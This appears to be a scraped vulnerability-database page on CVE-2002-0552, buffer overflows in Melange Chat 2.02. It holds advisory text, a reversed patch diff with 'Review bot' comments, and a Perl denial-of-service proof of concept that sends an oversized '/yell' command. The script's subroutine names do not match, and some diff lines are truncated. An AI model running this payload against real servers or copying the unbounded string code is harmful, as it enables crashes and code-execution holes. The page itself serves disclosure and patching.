CVE-2002-0552
CVSS 7.5
Published: 2002-07-03 00:00:00
Revised: 2008-09-05 16:28:19

[Original] Multiple buffer overflows in Melange Chat server 2.02 allow remote or local attackers to cause a denial of service (crash) and possibly execute arbitrary code via (1) a long argument in the /yell command, (2) long lines in the /etc/melange.conf configuration file, (3) long file names, or possibly other attacks.


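[CNNVD] Melange chat system melange.conf configuration line handling buffer overflow vulnerability (CNNVD-200207-035)

        
        Melange is a chat server program developed by Christian Walter; the author no longer maintains the application.
        Melange lacks proper bounds checking on the contents of configuration lines in the melange.conf configuration file, which can lead to a buffer overflow.
        A local attacker can edit the melange.conf configuration file and insert a single overly long line to trigger a buffer overflow in melange, resulting in a denial of service or execution of arbitrary commands with the privileges of the melange process.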
        

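- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]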

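- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found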

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0552
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0552
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-035
(Official data source) CNNVD

- Other links and resources

http://www.iss.net/security_center/static/8845.php
(VENDOR_ADVISORY)  XF  melange-chat-config-bo(8845)
http://www.securityfocus.com/bid/4510
(VENDOR_ADVISORY)  BID  4510
http://www.securityfocus.com/bid/4509
(UNKNOWN)  BID  4509
http://www.securityfocus.com/bid/4508
(UNKNOWN)  BID  4508
http://www.iss.net/security_center/static/8846.php
(UNKNOWN)  XF  melange-chat-filename-bo(8846)
http://www.iss.net/security_center/static/8842.php
(UNKNOWN)  XF  melange-chat-yell-bo(8842)
http://online.securityfocus.com/archive/1/267932
(UNKNOWN)  BUGTRAQ  20020416 Melange Chat POC DOS
http://archives.neohapsis.com/archives/bugtraq/2002-04/0157.html
(VENDOR_ADVISORY)  BUGTRAQ  20020414 Vulnerabilities in the Melange Chat Server

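- Vulnerability information

Melange chat system melange.conf configuration line handling buffer overflow vulnerability
High risk  Boundary condition error
2002-07-03 00:00:00 2006-09-21 00:00:00
Local
        
        Melange is a chat server program developed by Christian Walter; the author no longer maintains the application.
        Melange lacks proper bounds checking on the contents of configuration lines in the melange.conf configuration file, which can lead to a buffer overflow.
        A local attacker can edit the melange.conf configuration file and insert a single overly long line to trigger a buffer overflow in melange, resulting in a denial of service or execution of arbitrary commands with the privileges of the melange process.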
        

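- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends taking the following measures to reduce the threat:
        No suitable workaround is available.
        Vendor patch:
        Christian Walter
        ----------------
        Leon Harris (leon@quoll.com) provided the following patch: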
        diff -Naur server/atool.c ../melange-2.02-beta2/server/atool.c
        --- server/atool.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/atool.c Sun Dec 5 22:39:51 1999
        @@ -94,7 +94,7 @@
         strcpy(parameter,data);
        
         #ifdef DEBUG
        - snprintf(server.log.txt,sizeof(server.log.txt),"DEBUG (ATOOL): com: <> opt: <> par: <> at slot %d.\r\n",command,option,parameter,sender);
        + sprintf(server.log.txt,"DEBUG (ATOOL): com: <> opt: <> par: <> at slot %d.\r\n",command,option,parameter,sender);
         util_WriteLog(LL_DEBUG);
         #endif
        
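Review bot: The operands of this diff are reversed, so applying it forward removes the fix: in this hunk the '-' line is the bounded snprintf(server.log.txt,sizeof(server.log.txt),...) and the '+' line is the unbounded sprintf, and the '+++' file is the melange-2.02-beta2 original dated 1999. Regenerate the diff with the original tree as the first operand, or state that it must be applied in reverse (patch -R). Separately, the context line strcpy(parameter,data); at the top of the hunk stays unbounded and should get the same size-limited treatment as the log write.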
        diff -Naur server/auth.c ../melange-2.02-beta2/server/auth.c
        --- server/auth.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/auth.c Sun Dec 5 22:40:10 1999
        @@ -84,8 +84,6 @@
         if (util_isSet(UNIQUENICKS)==YES) {
         if ((util_isSet(GUESTLOGIN)==YES)&&(strcasecmp(client->name,"guest")==0)) {
         sprintf(salt,"%d%c",mySlot,0);
        - if (strlen(salt) + strlen(client->name) > sizeof(client->name))
        - return(ERR_NAME);
         strcat(client->name,salt);
         }
         else {
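Review bot: The length check on the '-' (fixed) side of the guest-login branch is off by one: strlen(salt) + strlen(client->name) > sizeof(client->name) still lets strcat run when the sum equals sizeof(client->name), and the terminating NUL then lands one byte past the array. Use >= so the terminator is counted. The sprintf(salt,"%d%c",mySlot,0) on the context line above is also unbounded; snprintf with sizeof(salt) would match the rest of the change.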
        diff -Naur server/chatutil.c ../melange-2.02-beta2/server/chatutil.c
        --- server/chatutil.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/chatutil.c Sun Dec 5 22:40:22 1999
        @@ -64,7 +64,7 @@
         sprintf(txt,MSG_LEAVE,slotID,slot[slotID].user->name);
         comm_SendChannelBut(SYSMSG,myChannel,slotID,txt);
         util_WriteMsgLog(txt);
        - strncpy(server.log.txt,txt,sizeof(server.log.txt));
        + strcpy(server.log.txt,txt);
         util_WriteLog(LL_NORMAL);
         }
        
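Review bot: strncpy(server.log.txt,txt,sizeof(server.log.txt)) on the '-' (fixed) side does not write a terminating NUL when txt is at least sizeof(server.log.txt) bytes long, which leaves the log buffer unterminated for the util_WriteLog call that follows. Add server.log.txt[sizeof(server.log.txt)-1]='\0'; after the copy, or use snprintf as the atool.c hunk does. The sprintf(txt,MSG_LEAVE,slotID,slot[slotID].user->name) three lines up is left unbounded and formats a user name into txt.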
        @@ -134,4 +134,4 @@
         if (slot[mySlot].user!=NULL)
         free(slot[mySlot].user);
         slot[mySlot].user=NULL;
        -}
        +}
        \ No newline at end of file
        diff -Naur server/client.c ../melange-2.02-beta2/server/client.c
        --- server/client.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/client.c Sun Dec 5 22:40:34 1999
        @@ -175,9 +175,9 @@
         if (util_GetNextSubString(inBuffer,cmd,MBUFFSIZE)!=OK)
         if ((strlen(inBuffer)>0)&&(strlen(inBuffer)<(MBUFFSIZE-2)))
         strcpy(cmd,inBuffer);
        - util_GetNextSubString(inBuffer,name,sizeof(client->name));
        - util_GetNextSubString(inBuffer,password,sizeof(client->passwd));
        - util_GetNextSubString(inBuffer,channel,sizeof(client->channel));
        + util_GetNextSubString(inBuffer,name,MBUFFSIZE);
        + util_GetNextSubString(inBuffer,password,MBUFFSIZE);
        + util_GetNextSubString(inBuffer,channel,MBUFFSIZE);
         if ((strlen(inBuffer)>0)&&(strlen(inBuffer)<(MBUFFSIZE-2)))
         strcpy(group,inBuffer);
        
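Review bot: The limits on the '-' (fixed) side are taken from a different object than the one being written: util_GetNextSubString(inBuffer,name,sizeof(client->name)) fills the local name but is bounded by the size of client->name, and likewise for password and channel. That is only safe if each local is at least as large as the struct field; the declarations are outside this hunk, so either bound by sizeof of the local destination or document the size relationship in a comment. The return values of these three calls are also ignored, unlike the cmd call above them, so a truncated or missing field passes silently.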
        diff -Naur server/commands.c ../melange-2.02-beta2/server/commands.c
        --- server/commands.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/commands.c Sun Dec 5 22:41:05 1999
        @@ -135,7 +135,7 @@
         int i;
         char message[500];
        
        - snprintf(message,sizeof(message)," ",message1);
        + sprintf(message," ",message1);
         if (strlen(message2)>0)
         strcat(message,message2);
         for (i=0;i        @@ -513,7 +513,7 @@
         }
         }
         sprintf(txt,MSG_NEWNAME,user,slot[user].user->name,myNewNick);
        - strncpy(slot[user].user->name,myNewNick,sizeof(slot[user].user->name));
        + strcpy(slot[user].user->name,myNewNick);
         comm_SendGroupBut(SYSMSG,user,txt);
         sprintf(txt,MSG_YOURNEWNAME,myNewNick,user);
         comm_SendTo(SYSMSG,user,txt);
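Review bot: In the hunk at line 135, bounding the first write with snprintf(message,sizeof(message),...) does not protect message[500], because the context line strcat(message,message2); that follows is still unbounded; build the string with one snprintf covering both parts, or use strncat limited to sizeof(message)-strlen(message)-1. In the hunk at line 513, strncpy(slot[user].user->name,myNewNick,sizeof(slot[user].user->name)) leaves name without a terminating NUL when myNewNick fills the field, so set the last byte to '\0' after the copy; the sprintf(txt,MSG_NEWNAME,...) just above it also formats both nicknames into txt with no limit.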
        diff -Naur server/interpret.c ../melange-2.02-beta2/server/interpret.c
        --- server/interpret.c Sat Jan 12 23:12:40 2002
        +++ ../melange-2.02-beta2/server/interpret.c Sun Dec 5 22:41:41 1999
        @@ -56,22 +56,22 @@
        
         strcpy(data,util_FitString(data));
        
        - if ( (strlen(data)<2) || (strlen(data) > 500 ) ) /* Can't be a command ! */
        + if (strlen(data)<2) /* Can't be a command ! */
         return(ERR_ILLEGALCMD);
        
         if (util_GetNextSubString(data,command,MBUFFSIZE)!=OK) /* Get command */
         if ((strlen(data)>0)&&(strlen(data)<(MBUFFSIZE-2)))
        - strncpy(command,data,sizeof(command));
        + strcpy(command,data);
         if (util_GetNextSubString(data,option,MBUFFSIZE)!=OK) /* Get option */
         if ((strlen(data)>0)&&(strlen(data)<(MBUFFSIZE-2)))
        - strncpy(option,data,sizeof(option));
        + strcpy(option,data);
         if ((strlen(data)>0)&&(strlen(data)<(MMAXTXTLEN-MBUFFSIZE))) /* Get parameter */
        - strncpy(parameter,data,sizeof(parameter));
        + strcpy(parameter,data);
         command[0]='/';
        
        
         #ifdef DEBUG
        - snprintf(server.log.txt,sizeof(server.log.txt),"DEBUG (User): com: <> opt: <> par: <> slot %d !\r\n",command,option,parameter,sender);
        + sprintf(server.log.txt,"DEBUG (User): com: <> opt: <> par: <> slot %d !\r\n",command,option,parameter,sender);
         util_WriteLog(LL_DEBUG);
         #endif
        
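Review bot: The upper bound strlen(data) > 500 on the '-' (fixed) side is a bare constant that is not tied to any of the buffers it protects, while the lines below size things by MBUFFSIZE and MMAXTXTLEN; derive the limit from those macros or from sizeof of the smallest destination so it cannot drift. The three strncpy calls into command, option and parameter need an explicit terminator at sizeof-1, since strncpy does not add one on truncation and the debug snprintf then reads all three.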
        diff -Naur server/main.c ../melange-2.02-beta2/server/main.c
        --- server/main.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/main.c Sun Dec 5 22:41:52 1999
        @@ -49,12 +49,12 @@
        
         printf ("(C) 1998,1999 by Christian Walter, All rights reserved\r\n
        http://melange.terminal.at
Email: chris@terminal.at\r\n\n",PRGVERSION);
         server.port=PORT;
        - strncpy(server.configFileName,CONFIGFILE,sizeof(server.configFileName));
        + strcpy(server.configFileName,CONFIGFILE);
         for (i=1;i         if ((strcasecmp(argv[i],"-p")==0)&&((i+1)         server.port=atoi(argv[i+1]);
         if ((strcasecmp(argv[i],"-c")==0)&&((i+1)        - strncpy(server.configFileName,argv[i+1],sizeof(server.configFileName));
        + strcpy(server.configFileName,argv[i+1]);
         }
         util_ChatInit();
        
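Review bot: For the -c argument, strncpy(server.configFileName,argv[i+1],sizeof(server.configFileName)) on the '-' (fixed) side silently truncates an over-long path and leaves configFileName unterminated when the argument fills it. Since this is a file path, reject the argument with an error when strlen(argv[i+1]) >= sizeof(server.configFileName) instead of continuing with a truncated name, and terminate the buffer explicitly in the CONFIGFILE default case as well.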

- Vulnerability information (21379)

Melange Chat System 2.0.2 Beta 2 /yell Remote Buffer Overflow Vulnerability (EDBID:21379)
multiple dos
2002-04-14 Verified
0 DVDMAN
N/A
source: http://www.securityfocus.com/bid/4508/info

Melange Chat System is a chat server program developed by Christian Walter. Currently support for this application is no longer available.

Due to inadequate bounds checking in Melange, it is possible for users to initiate a buffer overflow.

Submitting an unusually large /yell argument composed of arbitrary data could cause the overflow to occur.

#!/usr/bin/perl
#Melange Chat Server Remote DDOS POC
#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY


use Getopt::Std;
use IO::Socket;
$|=1;


my %options;
getopt('Hhp',\%options);
$arg2 = shift(@ARGV);
$options{h} && usage();
if ($options{H})
{
do_melage();
}
if ($options{p})
{
do_malange();
}
else
{
usage();
}
sub usage()
{
    print("[L33TSECURITY] Malange Chat Remote DDOS\n");
    print(" (C) DVDMAN \n\n");
    print("Usage: $0 [options]\n");
    print("-H = hostname or ip REQUIRED\n");
    print("-p = port of ftp server REQUIRED\n");
}
  
exit(1);

 

sub malange() {
my $test = $options{H};
my $test2 = $options{p};

    $remote = IO::Socket::INET->new(
                        Proto     => "tcp",
                                PeerAddr  => $test,
                                PeerPort  => $test2,
        );
    unless ($remote) {
           print"error cannot connect";
           return
        }
    $remote->autoflush(1);


print STDERR "Melange Chat Server REMOTE DDOS BY DVDMAN\n";
print STDERR " starting attack in 5 seconds...\n";
sleep(5);

my $user = "user test test 0 0\r\n";
my $exploit = "/yell" . " " . "A"x600;


print $remote $user;
print $remote $exploit;
print STDERR "DONE\n"; 
die "BYE\n";
}





#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY

		

- Vulnerability information

10393
Melange Chat Server Yell Command Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-04-14 Unknown
2002-04-14 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Melange Chat System Long Filename Buffer Overflow Vulnerability
Boundary Condition Error 4510
No Yes
2002-04-14 12:00:00 2009-07-11 11:56:00
Discovered by Leon Harris <leon@quoll.com>.

- Affected program versions

Melange Melange Chat System 2.0.2 Beta 2

- Vulnerability discussion

Melange Chat Systems is a chat application developed by Christian Walter. Currently support for this application is no longer available.

An issue has been reported in Melange Chat Systems, which could allow a user to initiate a buffer overflow.

The overflow occurs if the configuration file is renamed with an unusually long filename.

- Exploit

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

The discoverer of this issue, Leon Harris <leon@quoll.com>, has released a patch for this issue. Administrators who intend to apply this patch should be aware that this is an unofficial patch, and should be handled accordingly. The patch is available in the message listed in the references section of this alert.

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
